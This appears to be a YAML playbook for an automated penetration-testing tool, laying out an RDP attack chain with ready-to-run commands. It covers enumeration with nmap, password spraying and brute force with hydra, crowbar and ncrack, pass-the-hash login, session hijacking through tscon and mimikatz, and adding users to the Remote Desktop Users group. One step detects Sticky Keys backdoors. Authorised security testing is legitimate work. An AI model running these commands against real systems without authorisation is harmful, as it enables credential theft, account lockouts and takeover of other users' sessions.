id: rdp_pentesting
name: RDP Penetration Testing (Port 3389)
description: Comprehensive Remote Desktop Protocol enumeration, brute forcing, and session hijacking based on HackTricks methodology
category: enumeration
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_rdp_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [3389, 3390] }
      protocol: { "$in": ["rdp", "ms-wbt-server", "tcp"] }
    required_count: 1
    priority: 5
    description: Triggers when RDP service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: rdp_enumeration
    name: RDP Service Enumeration
    description: Identify RDP encryption, vulnerabilities, and server information
    order: 1
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap --script 'rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info' -p 3389 -T4 {host} -oN rdp_enum_{host}.txt"
        preferred: true
        notes: "Check encryption, DoS vulnerability (MS12-020), and NTLM info"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 3389 --script rdp-ntlm-info {host}"
        preferred: true
        notes: "Extract Windows version and internal hostname via NTLM"
        requires_elevation: false

  - id: rdp_password_spray
    name: RDP Password Spraying
    description: Password spraying against RDP (CAREFUL - can lock accounts!)
    order: 2
    timeout_seconds: 600
    commands:
      - tool: crowbar
        platforms: [linux, macos]
        command: "crowbar -b rdp -s {host}/32 -U users.txt -c 'password123'"
        preferred: true
        notes: "Password spraying with single password (be careful with account lockouts!)"
        requires_elevation: false
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -p 'password123' {host} rdp"
        preferred: true
        notes: "Hydra password spraying against RDP"
        requires_elevation: false

  - id: rdp_brute_force
    name: RDP Brute Force Authentication
    description: Brute force RDP credentials (CAREFUL - can lock accounts!)
    order: 3
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -P passwords.txt {host} rdp -t 4"
        preferred: true
        notes: "Multi-threaded RDP brute force (WARNING: may lock accounts!)"
        requires_elevation: false
      - tool: ncrack
        platforms: [linux, macos, windows]
        command: "ncrack -p 3389 --user administrator -P passwords.txt {host}"
        preferred: false
        notes: "Fast RDP password cracking"
        requires_elevation: false

  - id: rdp_credential_validation
    name: RDP Credential Validation
    description: Test known credentials against RDP service
    order: 4
    timeout_seconds: 120
    commands:
      - tool: rdp_check
        platforms: [linux, macos, windows]
        command: "rdp_check.py {domain}/{username}:{password}@{host}"
        preferred: true
        notes: "Validate credentials using Impacket rdp_check"
        requires_elevation: false
      - tool: xfreerdp
        platforms: [linux, macos, windows]
        command: "xfreerdp /v:{host} /u:{username} /p:{password} +auth-only"
        preferred: false
        notes: "Authentication-only test with xfreerdp"
        requires_elevation: false

  - id: rdp_connect_with_creds
    name: RDP Connection with Valid Credentials
    description: Connect to RDP with known credentials or hash
    order: 5
    timeout_seconds: 120
    commands:
      - tool: xfreerdp
        platforms: [linux, macos, windows]
        command: "xfreerdp /v:{host} /u:{username} /p:{password} /d:{domain} /cert-ignore"
        preferred: true
        notes: "Connect to RDP with domain credentials"
        requires_elevation: false
      - tool: xfreerdp
        platforms: [linux, macos, windows]
        command: "xfreerdp /v:{host} /u:{username} /pth:{hash} /cert-ignore"
        preferred: true
        notes: "Pass-the-hash RDP connection"
        requires_elevation: false
      - tool: rdesktop
        platforms: [linux, macos]
        command: "rdesktop -u {username} -p {password} -d {domain} {host}"
        preferred: false
        notes: "Legacy RDP client connection"
        requires_elevation: false

  - id: rdp_session_hijacking
    name: RDP Session Hijacking (Post-Exploitation)
    description: Hijack active RDP sessions with SYSTEM privileges
    order: 6
    timeout_seconds: 120
    commands:
      - tool: cmd
        platforms: [windows]
        command: "query user"
        preferred: true
        notes: "List all active RDP sessions (requires SYSTEM privileges)"
        requires_elevation: true
      - tool: cmd
        platforms: [windows]
        command: "tscon {session_id} /dest:{current_session}"
        preferred: true
        notes: "Hijack RDP session (will disconnect the original user)"
        requires_elevation: true
      - tool: mimikatz
        platforms: [windows]
        command: "mimikatz.exe 'privilege::debug' 'ts::sessions' exit"
        preferred: false
        notes: "List sessions with Mimikatz"
        requires_elevation: true
      - tool: mimikatz
        platforms: [windows]
        command: "mimikatz.exe 'privilege::debug' 'ts::remote /id:{session_id}' exit"
        preferred: false
        notes: "Connect to remote session with Mimikatz"
        requires_elevation: true

  - id: rdp_sticky_keys
    name: RDP Sticky Keys Backdoor Detection
    description: Detect if stickykeys or utilman backdoor is active
    order: 7
    timeout_seconds: 60
    commands:
      - tool: powershell
        platforms: [windows]
        command: "Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe'"
        preferred: true
        notes: "Check if Sticky Keys is backdoored (sethc.exe -> cmd.exe)"
        requires_elevation: false
      - tool: powershell
        platforms: [windows]
        command: "Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe'"
        preferred: true
        notes: "Check if Utilman is backdoored (utilman.exe -> cmd.exe)"
        requires_elevation: false

  - id: rdp_user_addition
    name: Add User to Remote Desktop Users Group
    description: Add user to RDP access group (requires admin privileges)
    order: 8
    timeout_seconds: 60
    commands:
      - tool: cmd
        platforms: [windows]
        command: "net localgroup 'Remote Desktop Users' {username} /add"
        preferred: true
        notes: "Add user to RDP users group"
        requires_elevation: true

metadata:
  tools:
    - nmap
    - crowbar
    - hydra
    - ncrack
    - xfreerdp
    - rdesktop
    - rdp_check
    - mimikatz
  cves:
    - CVE-2012-0002  # MS12-020 RDP DoS
    - CVE-2019-0708  # BlueKeep RDP RCE
    - CVE-2019-1181  # DejaBlue RDP RCE
    - CVE-2019-1182  # DejaBlue RDP RCE
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp
    - https://github.com/JoelGMSec/AutoRDPwn
  techniques:
    - Password spraying (account lockout risk!)
    - Pass-the-hash authentication
    - Session hijacking with SYSTEM privileges
    - Sticky keys backdoor
    - RDP process injection
    - Shadow attack
  batch_commands:
    nmap_enum: "nmap --script rdp-enum-encryption,rdp-ntlm-info -p 3389 -iL {targets_file} -oN rdp_scan.txt"
    crowbar: "crowbar -b rdp -s {targets}/32 -U users.txt -c 'password123'"
  notes: |
    WARNING: RDP brute forcing and password spraying can easily lock out accounts!
    Always verify account lockout policies before attempting authentication attacks.
    Session hijacking requires SYSTEM/Administrator privileges on the target.
